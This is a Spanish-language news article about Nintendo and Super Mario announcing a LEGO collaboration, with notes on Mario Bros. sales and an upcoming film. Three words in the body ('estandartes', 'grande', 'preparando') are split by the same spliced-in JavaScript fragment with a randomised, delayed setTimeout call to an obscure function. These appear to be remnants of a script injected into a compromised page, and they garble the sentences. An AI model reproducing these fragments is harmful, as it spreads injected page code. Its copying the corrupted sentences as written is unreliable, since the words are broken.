Nintendo y Super Mario unen fuerzas con Lego

    Nintendo y Super Mario unen fuerzas con Lego

    Ambas compañías se unen, pero aún no se sabe qué productos sacarán al mercado.

    Autor: Jaime O. Pérez 10 marzo, 2020


    Foto: Nintendo

     

    ¿Qué se traerán entre manos?

     

    Nintendo y uno de sus estandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andartes, Super Mario, han dado a conocer vía redes sociales que tendrán una colaboración junto a la empresa danesa LEGO.

     

    Tanto la empresa de videojuegos como la de juguetes, dieron a conocer la noticia: «Algo divertido está siendo construido. Estén atentos», se lee en el tuit que sacaron a la par.

     

     

    De igual manera, se ve una imagen de  Mario Bros, el cual está convertido en un bloque de construcción acompañado de un signo de interrogación.

     

    El personaje creado por Shigeru Miyamoto se une a la famosa marca de juguetes, LEGO, que ya cuenta con colaboraciones con Star Wars, Batman, etc.

     

    Foto: Nintendo

     

    Hasta el momento, no se sabe a ciencia cierta si serán juguetes, o un videojuego, o ambos, por lo que habrá que esperar la sorpresa que nos tienen preparada.

     

    Para 2022, Super Mario  saltará de nueva cuenta a la pantalla grandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ande, ya que Illumination y Universal Studios están preparandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando una próxima película.

     

     

    Mario Bros. y sus cifras

     

    El videojuego fue desarrollado por Nintendo en 1983. Hasta la fecha, en Japón, la versión de NES de Mario Bros. ha vendido más de 1,63 millones de copias.

     

    Mario Bros. ha sido relanzado para Wii, Nintendo 3DS y Wii U en los servicios de Consola Virtual en Japón, Norteamérica, Europa y Australia.

     

    Temas relacionados con esta nota: , , , ,

Ambas compañías se unen, pero aún no se sabe qué productos sacarán al mercado.